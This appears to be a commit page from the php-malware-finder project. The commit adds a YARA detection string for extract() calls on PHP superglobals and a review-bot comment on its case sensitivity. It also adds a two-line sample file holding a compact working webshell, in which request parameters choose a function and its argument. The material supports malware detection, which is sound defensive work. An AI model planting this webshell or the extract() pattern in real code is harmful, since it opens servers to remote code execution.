| author | jvoisin | 2017-04-26 17:30:22 +0200 |
|---|---|---|
| committer | jvoisin | 2017-04-26 17:30:22 +0200 |
| commit | 70728896028ab0443ea55e8793bf7da7571fc329 (patch) | |
| tree | 09083cdef376441f7cb89254b08bc0f423513cec | |
| parent | a13e01e548d4870afa7c2572dfa35f3600b1b71e (diff) | |
Add a detection for a smart webshell
| -rw-r--r-- | php-malware-finder/php.yar | 1 | ||||
| -rw-r--r-- | php-malware-finder/samples/undetected/smart.php | 2 |
2 files changed, 3 insertions, 0 deletions
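--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -98,6 +98,7 @@ rule DodgyPhp
 $various = "<!--#exec cmd=" //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec
 $at_eval = /@eval\s*\(/ nocase
 $double_var = /\${\s*\${/
+$extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
 
 condition:
 (any of them) and not IsWhitelisted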
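Review bot: The new `$extract` string on the added line is case-sensitive, but PHP resolves function names case-insensitively, so a file containing `EXTRACT($_POST)` or `Extract($_GET)` is not matched; the neighbouring `$at_eval` string already carries the `nocase` modifier for exactly this reason, so `$extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/ nocase` would keep the two consistent. The superglobal alternation also leaves out `$_FILES` and `$_ENV`, which are attacker-influenced inputs as well; whether adding them is worth the extra false-positive pressure under the `any of them` condition depends on the rest of the rule, which is outside this hunk. Legitimate legacy code does call `extract($_POST)`, so operators relying on this rule should expect to lean on `IsWhitelisted` for such hits. The `rule DodgyPhp` header and its earlier strings are outside the hunk.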
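--- /dev/null
+++ b/php-malware-finder/samples/undetected/smart.php
@@ -0,0 +1,2 @@
+<?php extract($_REQUEST); @die($ctime($atime));
+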
